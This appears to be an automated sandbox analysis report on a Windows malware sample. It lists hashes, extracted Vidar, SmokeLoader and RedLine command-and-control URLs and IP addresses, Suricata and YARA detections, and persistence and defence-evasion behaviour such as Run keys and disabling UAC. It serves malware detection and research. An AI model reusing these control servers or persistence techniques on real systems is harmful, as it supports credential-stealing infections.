Overview
overview
10Static
static
8 (1).exe
windows7_x64
108 (1).exe
windows10_x64
108 (10).exe
windows7_x64
108 (10).exe
windows10_x64
108 (11).exe
windows7_x64
88 (11).exe
windows10_x64
108 (12).exe
windows7_x64
108 (12).exe
windows10_x64
108 (13).exe
windows7_x64
108 (13).exe
windows10_x64
108 (14).exe
windows7_x64
108 (14).exe
windows10_x64
108 (15).exe
windows7_x64
108 (15).exe
windows10_x64
108 (16).exe
windows7_x64
108 (16).exe
windows10_x64
108 (17).exe
windows7_x64
108 (17).exe
windows10_x64
108 (18).exe
windows7_x64
108 (18).exe
windows10_x64
108 (19).exe
windows7_x64
108 (19).exe
windows10_x64
108 (2).exe
windows7_x64
108 (2).exe
windows10_x64
108 (20).exe
windows7_x64
108 (20).exe
windows10_x64
108 (21).exe
windows7_x64
108 (21).exe
windows10_x64
108 (22).exe
windows7_x64
108 (22).exe
windows10_x64
108 (23).exe
windows7_x64
108 (23).exe
windows10_x64
10Resubmissions
13/08/2021, 10:16
210813-wpta271jdx 1008/08/2021, 23:00
210808-fgs5g9pxfs 1007/08/2021, 23:12
210807-g2jw1lmd4a 1007/08/2021, 16:10
210807-51nhct4kfx 1006/08/2021, 23:43
210806-gc2271nxwj 1006/08/2021, 06:00
210806-f443x39x8a 1005/08/2021, 17:08
210805-97y6banvvx 1004/08/2021, 17:25
210804-hkxx2ntr8x 1004/08/2021, 12:12
210804-rjbg4b4y7n 1003/08/2021, 17:12
210803-r2h7ytjwqj 10Analysis
-
max time kernel
1802s -
max time network
1814s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
06/08/2021, 06:00
Static task
static1
Behavioral task
behavioral1
Sample
8 (1).exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
8 (1).exe
Resource
win10v20210408
Behavioral task
behavioral3
Sample
8 (10).exe
Resource
win7v20210410
Behavioral task
behavioral4
Sample
8 (10).exe
Resource
win10v20210408
Behavioral task
behavioral5
Sample
8 (11).exe
Resource
win7v20210410
Behavioral task
behavioral6
Sample
8 (11).exe
Resource
win10v20210408
Behavioral task
behavioral7
Sample
8 (12).exe
Resource
win7v20210410
Behavioral task
behavioral8
Sample
8 (12).exe
Resource
win10v20210408
Behavioral task
behavioral9
Sample
8 (13).exe
Resource
win7v20210410
Behavioral task
behavioral10
Sample
8 (13).exe
Resource
win10v20210410
Behavioral task
behavioral11
Sample
8 (14).exe
Resource
win7v20210408
Behavioral task
behavioral12
Sample
8 (14).exe
Resource
win10v20210410
Behavioral task
behavioral13
Sample
8 (15).exe
Resource
win7v20210408
Behavioral task
behavioral14
Sample
8 (15).exe
Resource
win10v20210410
Behavioral task
behavioral15
Sample
8 (16).exe
Resource
win7v20210410
Behavioral task
behavioral16
Sample
8 (16).exe
Resource
win10v20210408
Behavioral task
behavioral17
Sample
8 (17).exe
Resource
win7v20210410
Behavioral task
behavioral18
Sample
8 (17).exe
Resource
win10v20210408
Behavioral task
behavioral19
Sample
8 (18).exe
Resource
win7v20210410
Behavioral task
behavioral20
Sample
8 (18).exe
Resource
win10v20210408
Behavioral task
behavioral21
Sample
8 (19).exe
Resource
win7v20210410
Behavioral task
behavioral22
Sample
8 (19).exe
Resource
win10v20210410
Behavioral task
behavioral23
Sample
8 (2).exe
Resource
win7v20210408
Behavioral task
behavioral24
Sample
8 (2).exe
Resource
win10v20210410
Behavioral task
behavioral25
Sample
8 (20).exe
Resource
win7v20210408
Behavioral task
behavioral26
Sample
8 (20).exe
Resource
win10v20210410
Behavioral task
behavioral27
Sample
8 (21).exe
Resource
win7v20210408
Behavioral task
behavioral28
Sample
8 (21).exe
Resource
win10v20210410
Behavioral task
behavioral29
Sample
8 (22).exe
Resource
win7v20210410
Behavioral task
behavioral30
Sample
8 (22).exe
Resource
win10v20210408
General
-
Target
8 (12).exe
-
Size
3.0MB
-
MD5
bb072cad921aa5ce8b97706ce01bc570
-
SHA1
18bf034906c1341b7817e7361ad27a4425d820bd
-
SHA256
817a50d00909383bbef41e6f4e61b527d55f0873bcf745b29dbba75f52fe2e97
-
SHA512
d40e5f77d882ed29bd9de5a6848072e2f81cd02176955e2b1a4aedcdf4eb687d77bebe33cef0c7d702bc828181755f86e2564523d476adbb785f396a5ce1d474
Malware Config
Extracted
vidar
39.6
933
https://sslamlssa1.tumblr.com/
-
profile_id
933
Extracted
smokeloader
2020
http://conceitosseg.com/upload/
http://integrasidata.com/upload/
http://ozentekstil.com/upload/
http://finbelportal.com/upload/
http://telanganadigital.com/upload/
http://readinglistforjuly1.xyz/
http://readinglistforjuly2.xyz/
http://readinglistforjuly3.xyz/
http://readinglistforjuly4.xyz/
http://readinglistforjuly5.xyz/
http://readinglistforjuly6.xyz/
http://readinglistforjuly7.xyz/
http://readinglistforjuly8.xyz/
http://readinglistforjuly9.xyz/
http://readinglistforjuly10.xyz/
http://readinglistforjuly1.site/
http://readinglistforjuly2.site/
http://readinglistforjuly3.site/
http://readinglistforjuly4.site/
http://readinglistforjuly5.site/
http://readinglistforjuly6.site/
http://readinglistforjuly7.site/
http://readinglistforjuly8.site/
http://readinglistforjuly9.site/
http://readinglistforjuly10.site/
http://readinglistforjuly1.club/
http://readinglistforjuly2.club/
http://readinglistforjuly3.club/
http://readinglistforjuly4.club/
http://readinglistforjuly5.club/
http://readinglistforjuly6.club/
http://readinglistforjuly7.club/
http://readinglistforjuly8.club/
http://readinglistforjuly9.club/
http://readinglistforjuly10.club/
Extracted
redline
Focus1
135.148.139.222:33569
Extracted
redline
WW
193.56.146.60:51431
Signatures
-
Process spawned unexpected child process 3 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3780 3616 rUNdlL32.eXe 17 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5268 4332 rUNdlL32.eXe 149 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 7020 4332 rundll32.exe 149 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 4 IoCs
resource yara_rule behavioral8/memory/4860-304-0x0000000000418E5A-mapping.dmp family_redline behavioral8/memory/4860-302-0x0000000000400000-0x000000000041E000-memory.dmp family_redline behavioral8/memory/4536-345-0x00000000049E0000-0x00000000049FB000-memory.dmp family_redline behavioral8/memory/4536-353-0x0000000004C40000-0x0000000004C5A000-memory.dmp family_redline -
Registers COM server for autorun 1 TTPs
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 4 IoCs
resource yara_rule behavioral8/files/0x000200000001ab66-254.dat family_socelars behavioral8/files/0x000100000001ab6b-253.dat family_socelars behavioral8/files/0x000200000001ab66-257.dat family_socelars behavioral8/files/0x000100000001ab6b-259.dat family_socelars -
Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
description pid Process procid_target PID 4620 created 3920 4620 WerFault.exe 92 PID 4232 created 392 4232 WerFault.exe 113 -
Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs
description pid Process procid_target PID 5404 created 4384 5404 svchost.exe 131 PID 5404 created 6600 5404 svchost.exe 293 PID 5404 created 6824 5404 svchost.exe 300 -
suricata: ET MALWARE GCleaner Downloader Activity M1
suricata: ET MALWARE GCleaner Downloader Activity M1
-
suricata: ET MALWARE Generic Password Stealer User Agent Detected (RookIE)
suricata: ET MALWARE Generic Password Stealer User Agent Detected (RookIE)
-
suricata: ET MALWARE Observed Elysium Stealer Variant CnC Domain (all-brain-company .xyz in TLS SNI)
suricata: ET MALWARE Observed Elysium Stealer Variant CnC Domain (all-brain-company .xyz in TLS SNI)
-
suricata: ET MALWARE Possible Dridex Download URI Struct with no referer
suricata: ET MALWARE Possible Dridex Download URI Struct with no referer
-
suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
-
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
-
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
-
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Nirsoft 1 IoCs
resource yara_rule behavioral8/memory/584-406-0x0000000000400000-0x0000000000455000-memory.dmp Nirsoft -
Vidar Stealer 2 IoCs
resource yara_rule behavioral8/memory/3920-183-0x0000000000B70000-0x0000000000C0D000-memory.dmp family_vidar behavioral8/memory/3920-186-0x0000000000400000-0x00000000008F2000-memory.dmp family_vidar -
resource yara_rule behavioral8/files/0x000100000001ab57-120.dat aspack_v212_v242 behavioral8/files/0x000100000001ab57-121.dat aspack_v212_v242 behavioral8/files/0x000100000001ab52-124.dat aspack_v212_v242 behavioral8/files/0x000100000001ab53-125.dat aspack_v212_v242 behavioral8/files/0x000100000001ab52-129.dat aspack_v212_v242 behavioral8/files/0x000100000001ab52-128.dat aspack_v212_v242 behavioral8/files/0x000100000001ab53-123.dat aspack_v212_v242 behavioral8/files/0x000100000001ab55-130.dat aspack_v212_v242 behavioral8/files/0x000100000001ab55-131.dat aspack_v212_v242 -
Blocklisted process makes network request 48 IoCs
flow pid Process 426 7144 MsiExec.exe 429 7144 MsiExec.exe 431 7144 MsiExec.exe 432 7144 MsiExec.exe 433 7144 MsiExec.exe 434 7144 MsiExec.exe 435 7144 MsiExec.exe 436 7144 MsiExec.exe 437 7144 MsiExec.exe 438 7144 MsiExec.exe 439 7144 MsiExec.exe 441 7144 MsiExec.exe 442 7144 MsiExec.exe 444 7144 MsiExec.exe 445 7144 MsiExec.exe 446 7144 MsiExec.exe 447 7144 MsiExec.exe 448 7144 MsiExec.exe 449 7144 MsiExec.exe 450 7144 MsiExec.exe 451 7144 MsiExec.exe 452 7144 MsiExec.exe 453 7144 MsiExec.exe 454 7144 MsiExec.exe 455 7144 MsiExec.exe 456 7144 MsiExec.exe 457 7144 MsiExec.exe 458 7144 MsiExec.exe 459 7144 MsiExec.exe 461 7144 MsiExec.exe 462 7144 MsiExec.exe 463 7144 MsiExec.exe 464 7144 MsiExec.exe 466 7144 MsiExec.exe 467 7144 MsiExec.exe 468 7144 MsiExec.exe 469 7144 MsiExec.exe 470 7144 MsiExec.exe 471 7144 MsiExec.exe 472 7144 MsiExec.exe 473 7144 MsiExec.exe 474 7144 MsiExec.exe 475 7144 MsiExec.exe 476 7144 MsiExec.exe 477 7144 MsiExec.exe 478 7144 MsiExec.exe 479 7144 MsiExec.exe 480 7144 MsiExec.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts Daldoula.exe -
Executes dropped EXE 64 IoCs
pid Process 2520 setup_installer.exe 1492 setup_install.exe 1608 sonia_6.exe 3924 sonia_1.exe 3920 sonia_3.exe 3952 sonia_2.exe 2248 sonia_4.exe 1652 sonia_5.exe 3248 sonia_1.exe 2504 jfiag3g_gg.exe 4700 jfiag3g_gg.exe 2920 F5KxfcnjllEXYHxs018b2Rwy.exe 4048 KElpfrzwUGLUdc_9rwohEOlO.exe 4252 73N2f3dsqZtT_GryIgwJzBYi.exe 4400 zZCNMCvyd604ZSbu0Gww4ZQp.exe 392 uXr09RWmY6SRMbrDSFfaZ_0f.exe 1228 dhu7EuXl9V9UCb1xTP4C8z2_.exe 4536 eeKqGdOincy_ixPYMRHkQJWN.exe 3244 m_fBIbDOJjJ40H7N08r37W_j.exe 2400 hsCdANIUKB4wzcSDG7GdlU2e.exe 4972 lJP2dxEPmNCJIDNdHyFHwpJu.exe 4956 powershell.exe 4864 C2dq7a8ZKe65UPgzVtenVMuG.exe 5064 mBIlmAn3SwRW5L9XM4_Hisb2.exe 5088 i5bS_Ih72f4r9YsRDRsMHIek.exe 4860 m_fBIbDOJjJ40H7N08r37W_j.exe 5080 tG6iObmAGaX11buSI23Q6usP.exe 5032 hJnmKJvqSgAJfTJT6M9Cw6Ri.exe 1648 uHm09NMJM6F4Q046FphKs_dN.exe 580 c7ITdNhhcio8ABAfjezodNVE.exe 4384 Z0mpIdw250ioIlFq9G4jxj2t.exe 2136 AIk1de2B5c8JTfTJCb9GhHAo.exe 1484 AIk1de2B5c8JTfTJCb9GhHAo.tmp 4608 jfiag3g_gg.exe 2396 Z0mpIdw250ioIlFq9G4jxj2t.exe 4132 md8_8eus.exe 3512 jooyu.exe 4008 jfiag3g_gg.exe 584 11111.exe 5040 jfiag3g_gg.exe 5212 Setup.exe 5248 11111.exe 5376 11111.exe 5412 22222.exe 5496 GameBox64bit.exe 5516 GameBox32Bit.exe 5532 BotCheck.exe 5564 GameBox.exe 5600 note8876.exe 5632 GameBoxWin32.exe 5744 GameBoxWin32.tmp 5836 jfiag3g_gg.exe 5932 8227740.exe 5940 11111.exe 5996 11111.exe 5420 BotCheck.exe 4108 22222.exe 4908 22222.exe 5984 2845038.exe 5932 8227740.exe 6028 2653054.exe 6080 5942205.exe 5228 AB7E.exe 5412 22222.exe -
resource yara_rule behavioral8/files/0x000100000001ab5c-174.dat upx behavioral8/files/0x000100000001ab5c-175.dat upx behavioral8/files/0x000200000001561c-234.dat upx behavioral8/files/0x000200000001561c-235.dat upx -
resource yara_rule behavioral8/memory/4132-386-0x0000000000400000-0x000000000067D000-memory.dmp vmprotect -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Control Panel\International\Geo\Nation sonia_5.exe Key value queried \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Control Panel\International\Geo\Nation Gagorehepi.exe -
Drops startup file 3 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fastsystem2021.exe Z0mpIdw250ioIlFq9G4jxj2t.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fastsystem2021.exe Z0mpIdw250ioIlFq9G4jxj2t.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\YbaOmNXcbb.url Preme.exe.com -
Loads dropped DLL 64 IoCs
pid Process 1492 setup_install.exe 1492 setup_install.exe 1492 setup_install.exe 1492 setup_install.exe 1492 setup_install.exe 1492 setup_install.exe 1492 setup_install.exe 1492 setup_install.exe 3952 sonia_2.exe 2416 rundll32.exe 2400 hsCdANIUKB4wzcSDG7GdlU2e.exe 5032 hJnmKJvqSgAJfTJT6M9Cw6Ri.exe 1484 AIk1de2B5c8JTfTJCb9GhHAo.tmp 1484 AIk1de2B5c8JTfTJCb9GhHAo.tmp 5032 hJnmKJvqSgAJfTJT6M9Cw6Ri.exe 5088 i5bS_Ih72f4r9YsRDRsMHIek.exe 5088 i5bS_Ih72f4r9YsRDRsMHIek.exe 5744 GameBoxWin32.tmp 5032 hJnmKJvqSgAJfTJT6M9Cw6Ri.exe 5032 hJnmKJvqSgAJfTJT6M9Cw6Ri.exe 5692 rundll32.exe 5032 hJnmKJvqSgAJfTJT6M9Cw6Ri.exe 5496 GameBox64bit.exe 5496 GameBox64bit.exe 5032 hJnmKJvqSgAJfTJT6M9Cw6Ri.exe 6004 c7ITdNhhcio8ABAfjezodNVE.exe 6004 c7ITdNhhcio8ABAfjezodNVE.exe 5032 hJnmKJvqSgAJfTJT6M9Cw6Ri.exe 5032 hJnmKJvqSgAJfTJT6M9Cw6Ri.exe 5032 hJnmKJvqSgAJfTJT6M9Cw6Ri.exe 492 31E8.exe 5592 38EE.exe 5592 38EE.exe 5592 38EE.exe 5592 38EE.exe 5592 38EE.exe 5032 hJnmKJvqSgAJfTJT6M9Cw6Ri.exe 5100 installer.exe 5100 installer.exe 5100 installer.exe 6068 MsiExec.exe 6068 MsiExec.exe 7036 rundll32.exe 7144 MsiExec.exe 7144 MsiExec.exe 7144 MsiExec.exe 7144 MsiExec.exe 7144 MsiExec.exe 7144 MsiExec.exe 7144 MsiExec.exe 7144 MsiExec.exe 7144 MsiExec.exe 7144 MsiExec.exe 5100 installer.exe 7144 MsiExec.exe 7144 MsiExec.exe 6864 MsiExec.exe 6864 MsiExec.exe 6864 MsiExec.exe 6864 MsiExec.exe 6864 MsiExec.exe 6864 MsiExec.exe 6864 MsiExec.exe 7144 MsiExec.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 4 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.exe" sonia_6.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" 8227740.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Company\\Dulatucaepae.exe\"" Daldoula.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Test = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Library\\22A5.exe" 22A5.exe -
Checks for any installed AV software in registry 1 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\SOFTWARE\KasperskyLab powershell.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 22A5.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md8_8eus.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA note8876.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 22A5.exe -
Drops desktop.ini file(s) 2 IoCs
description ioc Process File created C:\Users\Admin\Desktop\desktop.ini 22A5.exe File created C:\Users\Admin\Documents\desktop.ini 22A5.exe -
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\G: installer.exe File opened (read-only) \??\H: installer.exe File opened (read-only) \??\K: installer.exe File opened (read-only) \??\Y: installer.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\O: installer.exe File opened (read-only) \??\V: installer.exe File opened (read-only) \??\W: installer.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\Q: installer.exe File opened (read-only) \??\U: installer.exe File opened (read-only) \??\X: installer.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\S: installer.exe File opened (read-only) \??\A: installer.exe File opened (read-only) \??\F: installer.exe File opened (read-only) \??\I: installer.exe File opened (read-only) \??\J: installer.exe File opened (read-only) \??\L: installer.exe File opened (read-only) \??\P: installer.exe File opened (read-only) \??\R: installer.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\B: installer.exe File opened (read-only) \??\Z: installer.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\T: installer.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\E: installer.exe File opened (read-only) \??\N: installer.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\M: installer.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\M: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 8 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 355 ip-api.com 12 ipinfo.io 13 ipinfo.io 14 ip-api.com 20 api.db-ip.com 21 api.db-ip.com 179 ipinfo.io 186 ipinfo.io -
Drops file in System32 directory 17 IoCs
description ioc Process File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #2 svchost.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #3 svchost.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #4 svchost.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #5 svchost.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #6 svchost.exe File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini rundll32.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\644B8874112055B5E195ECB0E8F243A4 svchost.exe File opened for modification C:\Windows\System32\Tasks\AdvancedUpdater svchost.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI rundll32.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\644B8874112055B5E195ECB0E8F243A4 svchost.exe File opened for modification C:\Windows\System32\Tasks\Firefox Default Browser Agent 9F392ABC65E4EFF3 svchost.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #1 svchost.exe File opened for modification C:\Windows\System32\GroupPolicy rundll32.exe File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol rundll32.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat svchost.exe File opened for modification C:\Windows\System32\Tasks\hdvAaRs svchost.exe File opened for modification C:\Windows\System32\Tasks\Firefox Default Browser Agent 06B6E8B6FC38A101 svchost.exe -
Suspicious use of SetThreadContext 10 IoCs
description pid Process procid_target PID 740 set thread context of 2384 740 svchost.exe 99 PID 740 set thread context of 4736 740 svchost.exe 103 PID 4252 set thread context of 4956 4252 73N2f3dsqZtT_GryIgwJzBYi.exe 138 PID 3244 set thread context of 4860 3244 m_fBIbDOJjJ40H7N08r37W_j.exe 122 PID 4400 set thread context of 4048 4400 ufgaa.exe 204 PID 580 set thread context of 6004 580 c7ITdNhhcio8ABAfjezodNVE.exe 210 PID 4528 set thread context of 7136 4528 wgcfjss 325 PID 668 set thread context of 6420 668 Preme.exe.com 365 PID 4412 set thread context of 6460 4412 wgcfjss 377 PID 5476 set thread context of 2908 5476 wgcfjss 390 -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files (x86)\GameBox INC\GameBox\d.jfm note8876.exe File created C:\Program Files (x86)\lighteningplayer\regstr hJnmKJvqSgAJfTJT6M9Cw6Ri.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libattachment_plugin.dll hJnmKJvqSgAJfTJT6M9Cw6Ri.exe File created C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libadummy_plugin.dll hJnmKJvqSgAJfTJT6M9Cw6Ri.exe File created C:\Program Files (x86)\lighteningplayer\plugins\logger\libfile_logger_plugin.dll hJnmKJvqSgAJfTJT6M9Cw6Ri.exe File created C:\Program Files (x86)\Company\NewProduct\d md8_8eus.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\create_stream.html hJnmKJvqSgAJfTJT6M9Cw6Ri.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\requests\status.json hJnmKJvqSgAJfTJT6M9Cw6Ri.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libau_plugin.dll hJnmKJvqSgAJfTJT6M9Cw6Ri.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\librawvid_plugin.dll hJnmKJvqSgAJfTJT6M9Cw6Ri.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\js\ui.js hJnmKJvqSgAJfTJT6M9Cw6Ri.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libaccess_realrtsp_plugin.dll hJnmKJvqSgAJfTJT6M9Cw6Ri.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\librawdv_plugin.dll hJnmKJvqSgAJfTJT6M9Cw6Ri.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libwav_plugin.dll hJnmKJvqSgAJfTJT6M9Cw6Ri.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\custom.lua hJnmKJvqSgAJfTJT6M9Cw6Ri.exe File created C:\Program Files (x86)\lighteningplayer\lua\playlist\anevia_xml.luac hJnmKJvqSgAJfTJT6M9Cw6Ri.exe File created C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_dts_plugin.dll hJnmKJvqSgAJfTJT6M9Cw6Ri.exe File created C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_mpegvideo_plugin.dll hJnmKJvqSgAJfTJT6M9Cw6Ri.exe File created C:\Program Files (x86)\UltraMediaBurner\is-5B20Q.tmp ultramediaburner.tmp File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\jquery-ui-1.8.13.custom.css hJnmKJvqSgAJfTJT6M9Cw6Ri.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\stream_config_window.html hJnmKJvqSgAJfTJT6M9Cw6Ri.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libgme_plugin.dll hJnmKJvqSgAJfTJT6M9Cw6Ri.exe File opened for modification C:\Program Files\temp_files\ hJnmKJvqSgAJfTJT6M9Cw6Ri.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\stream_window.html hJnmKJvqSgAJfTJT6M9Cw6Ri.exe File created C:\Program Files (x86)\lighteningplayer\plugins\misc\libstats_plugin.dll hJnmKJvqSgAJfTJT6M9Cw6Ri.exe File created C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_vc1_plugin.dll hJnmKJvqSgAJfTJT6M9Cw6Ri.exe File created C:\Program Files\temp_files\data.dll data_load.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\js\controllers.js hJnmKJvqSgAJfTJT6M9Cw6Ri.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libdvdnav_plugin.dll hJnmKJvqSgAJfTJT6M9Cw6Ri.exe File opened for modification C:\Program Files (x86)\hdvAaRs powershell.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\images\buttons.png hJnmKJvqSgAJfTJT6M9Cw6Ri.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libaccess_imem_plugin.dll hJnmKJvqSgAJfTJT6M9Cw6Ri.exe File created C:\Program Files (x86)\lighteningplayer\plugins\meta_engine\libtaglib_plugin.dll hJnmKJvqSgAJfTJT6M9Cw6Ri.exe File created C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_dirac_plugin.dll hJnmKJvqSgAJfTJT6M9Cw6Ri.exe File created C:\Program Files (x86)\lighteningplayer\lua\modules\dkjson.luac hJnmKJvqSgAJfTJT6M9Cw6Ri.exe File created C:\Program Files (x86)\lighteningplayer\lua\playlist\rockbox_fm_presets.luac hJnmKJvqSgAJfTJT6M9Cw6Ri.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libftp_plugin.dll hJnmKJvqSgAJfTJT6M9Cw6Ri.exe File created C:\Program Files (x86)\lighteningplayer\plugins\control\libwin_hotkeys_plugin.dll hJnmKJvqSgAJfTJT6M9Cw6Ri.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\Uninstall.exe Setup.exe File created C:\Program Files (x86)\lighteningplayer\lua\playlist\liveleak.luac hJnmKJvqSgAJfTJT6M9Cw6Ri.exe File created C:\Program Files (x86)\lighteningplayer\plugins\keystore\libmemory_keystore_plugin.dll hJnmKJvqSgAJfTJT6M9Cw6Ri.exe File created C:\Program Files (x86)\lighteningplayer\plugins\video_splitter\libclone_plugin.dll hJnmKJvqSgAJfTJT6M9Cw6Ri.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\note8876.exe Setup.exe File created C:\Program Files (x86)\lighteningplayer\lua\intf\telnet.luac hJnmKJvqSgAJfTJT6M9Cw6Ri.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libsmf_plugin.dll hJnmKJvqSgAJfTJT6M9Cw6Ri.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libtta_plugin.dll hJnmKJvqSgAJfTJT6M9Cw6Ri.exe File created C:\Program Files (x86)\lighteningplayer\plugins\gui\libqt_plugin.dll hJnmKJvqSgAJfTJT6M9Cw6Ri.exe File created C:\Program Files (x86)\lighteningplayer\plugins\text_renderer\libtdummy_plugin.dll 